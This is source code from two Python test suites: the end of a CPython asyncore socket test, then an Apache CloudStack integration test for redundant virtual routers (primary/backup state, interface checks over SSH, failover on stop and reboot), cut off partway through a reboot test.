@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
support.join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
test_redundant_router.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkOffering,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls._cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetworkOffering(self):
"""Test create RvR supported network offering
"""
# Steps to validate
# 1. create a network offering
# - all services by VirtualRouter
# - enable RedundantRouter servicecapability
# 2. enable the network offering
# Validate the following
# 1. Redundant Router offering should be created successfully and
# listed in listNetworkOfferings response
# assert if RvR capability is enabled
self.debug("Creating network offering with redundant VR capability")
try:
network_offering = NetworkOffering.create(
self.apiclient,
self.testdata["nw_off_isolated_RVR"],
conservemode=True
)
except Exception as e:
self.fail("Create network offering failed! - %s" % e)
self.debug("Enabling network offering - %s" % network_offering.name)
# Enable Network offering
network_offering.update(self.apiclient, state='Enabled')
self.cleanup.append(network_offering)
self.debug("Checking if the network offering created successfully?")
network_offs = NetworkOffering.list(
self.apiclient,
id=network_offering.id,
listall=True
)
self.assertEqual(
isinstance(network_offs, list),
True,
"List network offering should not return empty response"
)
self.assertEqual(
len(network_offs),
1,
"List network off should have newly created network off"
)
for service in network_offs[0].service:
if service.name == 'SourceNat':
self.debug("Verifying SourceNat capabilites")
for capability in service.capability:
if capability.name == 'RedundantRouter':
                        self.assertEqual(
                            capability.value,
                            'true',
                            "RedundantRouter capability should be enabled")
self.debug("RedundantRouter is enabled")
return
class TestCreateRvRNetwork(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetwork(self):
"""Test create network with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & primary)"
)
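        # Router.list returns the pair in arbitrary order, so classify the
        # two routers by their reported redundantstate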
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Redundant states: %s, %s" % (
primary_router.redundantstate,
backup_router.redundantstate
))
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkNonDefaultGuestCidr,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_createRvRNetwork(self):
"""Test create network with non-default guest cidr with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# - gw = 192.168.2.1 and cidr = 192.168.2.0/23
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id,
netmask='255.255.254.0',
gateway='192.168.2.1'
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.assertEqual(
nw_response.gateway,
'192.168.2.1',
"The gateway should be 192.168.2.1"
)
self.assertEqual(
nw_response.cidr,
'192.168.2.0/23',
"Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestRVRInternals(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.hypervisor = self.testClient.getHypervisorInfo()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_redundantVR_internals(self):
"""Test redundant router internals
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# 2. listRouters in above network
# 3. deployVM in above user account in the created network
# 4. login to both Redundant Routers
# 5. login to user VM
# 6. delete user account
# Validate the following:
# 1. listNetworks lists network in Allocated state
# 2. listRouters lists no routers created yet
# 3. listRouters returns Primary and Backup routers
# 4. ssh in to both routers and verify:
# - PRIMARY router has eth2 with public Ip address
# - BACKUP router has only guest eth0 and link local eth1
        # - broadcast address on PRIMARY eth2 is set (not 0.0.0.0)
        # - execute checkrouter.sh on each router and check that its status
        #   matches the "PRIMARY|BACKUP" state returned by the listRouters API
# 5. DNS of the user VM is set to RedundantRouter Gateway
# (/etc/resolv.conf)
# Check that the default gateway for the guest is the rvr gateway
# and not the guestIp of either of the RvRs
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Fetching the host details for double hop into router")
hosts = Host.list(
self.apiclient,
id=primary_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
primary_host = hosts[0]
self.debug("Host for primary router: %s" % primary_host.name)
self.debug("Host for primary router: %s" % primary_host.ipaddress)
hosts = Host.list(
self.apiclient,
id=backup_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
backup_host = hosts[0]
self.debug("Host for backup router: %s" % backup_host.name)
self.debug("Host for backup router: %s" % backup_host.ipaddress)
self.debug(primary_router.linklocalip)
# Check eth2 port for primary router
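        # On VMware/Hyper-V the router's link-local IP is only reachable via
        # the management server, so hop through mgtSvr; on other hypervisors
        # SSH goes through the host running the router VM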
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
primary_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
primary_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
primary_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.debug("Router's public Ip: %s" % primary_router.publicip)
self.assertEqual(
res.count("state UP"),
1,
"PRIMARY router's public interface should be UP"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
# Check eth2 port for backup router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
backup_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
backup_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
backup_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.assertEqual(
res.count("state DOWN"),
1,
"BACKUP router's public interface should be DOWN"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
vms = VirtualMachine.list(
self.apiclient,
id=virtual_machine.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List VMs should not return empty response"
)
vm = vms[0]
        self.assertNotEqual(
            vm.nic[0].gateway,
            primary_router.publicip,
            "The gateway of the user VM should not be the primary router's public IP"
        )
        self.assertNotEqual(
            vm.nic[0].gateway,
            backup_router.publicip,
            "The gateway of the user VM should not be the backup router's public IP"
        )
return
class TestRvRRedundancy(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
        cls.network_offering_for_update = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering_for_update)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls.network_offering_for_update.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.insert(0, self.account)
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_01_stopPrimaryRvR(self):
"""Test stop primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
        # 4. listRouters with redundantstate=PRIMARY. Only one router is
        #    returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is Primary. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN, and the old BACKUP router as
# new PRIMARY
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the PRIMARY router")
try:
Router.stop(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the primary router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old PRIMARY router")
try:
Router.start(self.apiclient, id=primary_router.id)
self.debug("old PRIMARY router started")
except Exception as e:
self.fail("Failed to start primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
        # wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_03_rebootPrimaryRvR(self):
"""Test reboot primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is PRIMARY. Router reboots state
# successfully
# 6. lists old PRIMARY router in redundantstate=BACKUP and the old
# BACKUP router as new PRIMARY + public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the primary router")
try:
Router.reboot(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to reboot PRIMARY router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
